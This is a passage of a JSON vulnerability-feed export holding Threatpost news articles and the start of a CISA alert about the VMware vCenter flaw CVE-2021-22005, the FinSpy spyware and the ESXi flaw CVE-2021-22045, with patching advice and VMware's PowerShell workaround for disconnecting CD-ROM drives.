vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n\n_**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe time to act is yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Planker, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. \u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. \u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. \u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected with an HTTPS protocol. [![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. \u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they\u2019re vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the command-and-control (C2) server terminates the infection process.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28125042/SAS-2-1024x527.png)\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov and, presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28124956/finspy-1024x492.png)\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28124846/Finspy-plugin.png)\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-06T19:25:47", "description": "A security vulnerability in VMware\u2019s Cloud Foundation, ESXi, Fusion and Workstation platforms could pave the way for hypervisor takeover in virtual environments \u2013 and a patch is still pending for some users.\n\nThe issue affects a wide swath of the virtualization specialist\u2019s portfolio and affects Windows, Linux and Mac users. Details about the platforms:\n\n * Cloud Foundation is VMware\u2019s multicloud management platform, providing software-defined services for compute, storage, network, security, Kubernetes and so on.\n * ESXi is a bare-metal hypervisor that installs on a server and partitions it into multiple virtual machines (VMs).\n * Fusion is a software hypervisor that allows Intel-based Macs to run VMs with guest operating systems \u2013 such as Microsoft Windows, Linux, NetWare, Solaris or macOS.\n * Workstation enables users to set up VMs on a single physical machine.\n\nThe bug (CVE-2021-22045) is a high-severity heap-overflow vulnerability carrying a CVSS rating of 7.7 out of 10. Heap overflows are memory issues that can result in data corruption or unexpected behavior by any process that accesses the affected memory area \u2013 in some cases resulting in remote code execution (RCE).\n\nIn this case, the problem specifically exists in the CD-ROM device emulation function of the affected products.\n\n\u201cA malicious actor with access to a virtual machine with CD-ROM device emulation may be able to exploit this vulnerability in conjunction with other issues, to execute code on the hypervisor from a virtual machine,\u201d the vendor noted in its advisory. \u201cSuccessful exploitation requires a CD image to be attached to the virtual machine.\u201d\n\nReno Robert, senior vulnerability researcher for Trend Micro\u2019s Zero Day Initiative, told Threatpost that the issue results from \u201cthe lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer.\u201d\n\n## Complex but Dangerous Exploitation\n\nRobert added that even though the bug allows an untrusted guest OS user to execute code on the hypervisor, \u201can attacker would not have control over the data written, so exploitation this would be difficult.\u201d\n\nHence the need to be used \u201cin conjunction with other issues.\u201d Reno explained that an example of other issues \u201ccould be an information-disclosure vulnerability that provide details on the memory layout. This would making exploitation more feasible.\u201d\n\nIf successful though, attackers could compromise the host operating system of the hypervisor. Taking over a hypervisor, which is the highly privileged software that creates and runs VMs and governs how resources are shared among them (such as memory and processing), can give cybercriminals a clear path to accessing any of the data or applications stored in the VMs it controls, and executing code or installing files on those VMs, depending on the security controls that are implemented.\n\nResearcher \u201cJaanus K\\xc3\\xa4\\xc3\\xa4p\u201d with Clarified Security and Trend Micro\u2019s ZDI were credited with discovering the bug.\n\n## **Patch VMware CVE-2021-22045 Now**\n\nAffected product versions are: ESXi 6.5, 6.7 and 7 (version 7 remains unpatched for now); Fusion 12.x; Workstation 16.x; and all versions of VMware Cloud Foundation. Patch information can be found in the [vendor\u2019s advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0001.html>).\n\nUsers should patch as soon as possible, given that VMware is a favorite target for cybercriminals. For instance, just days after a critical CVE-2021-22005 RCE vulnerability in VMware vCenter was disclosed, a full working exploit [was public and being used](<https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/>) in the wild.\n\nESXi users are especially at risk: While the solution makes it easy for multiple VMs to share the same hard-drive storage, it also sets systems up to be one-stop shopping spots for attacks, researchers say, since attackers can target the centralized virtual hard drives used to store data from across VMs.\n\n\u201cESXi servers represent an attractive target for ransomware threat actors because they can attack multiple VMs at once, where each of the VMs could be running business-critical applications or services,\u201d Andrew Brandt, principal researcher at Sophos, [recently explained](<https://threatpost.com/vmware-esxi-encrypted-python-script-ransomware/175374/>). \u201cAttacks on hypervisors can be both fast and highly disruptive.\u201d\n\nHe was discussing a spate of attacks in October that used a Python code that took less than three hours to complete a ransomware attack on ESXi servers, from initial breach to encryption. That incident joined other ransomware efforts targeting the hypervisor: REvil ransomware threat actors last year came up with a [Linux variant](<https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/>) that targeted VMware ESXi; and in September [HelloKitty joined](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) the growing list going after the juicy target. DarkSide [also targeted](<https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version>) ESXi servers last year.\n\n## **Workaround for ESXi v.7 Users**\n\nOf course, all of that is bad news for ESXi v.7 users, who don\u2019t yet have a patch for this latest bug. VMware did, however, [issue a workaround](<https://kb.vmware.com/s/article/87249>) that can be used for now, involving disabling CD-ROM/DVD functionality.\n\nThe steps are:\n\n 1. Log in to a vCenter Server system using the vSphere Web Client.\n 2. Right-click the virtual machine and click Edit Settings.\n 3. Select the CD/DVD drive and uncheck \u201cConnected\u201d and \u201cConnect at power on\u201d and remove any attached ISOs.\n\nTo enumerate the VMs that have a CD-ROM/DVD device attached, users can run the following command, according to the vendor:\n\n**Get-VM | Get-CDDrive | Where {$_.extensiondata.connectable.connected -eq $true} | Select Parent**\n\nThen the following command will remove and disconnect the attached CD-ROM/DVD device:\n\n**Get-VM | Get-CDDrive | Where {$_.extensiondata.connectable.connected -eq $true} | Set-CDDrive -NoMedia -confirm:$false**\n\n**_Password_**_ _**_Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-06T16:47:44", "type": "threatpost", "title": "Partially Unpatched VMware Bug Opens Door to Hypervisor Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-22045"], "modified": "2022-01-06T16:47:44", "id": "THREATPOST:52B3DE7108A575C635073D53A3E635EE", "href": "https://threatpost.com/unpatched-vmware-bug-hypervisor-takeover/177428/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for 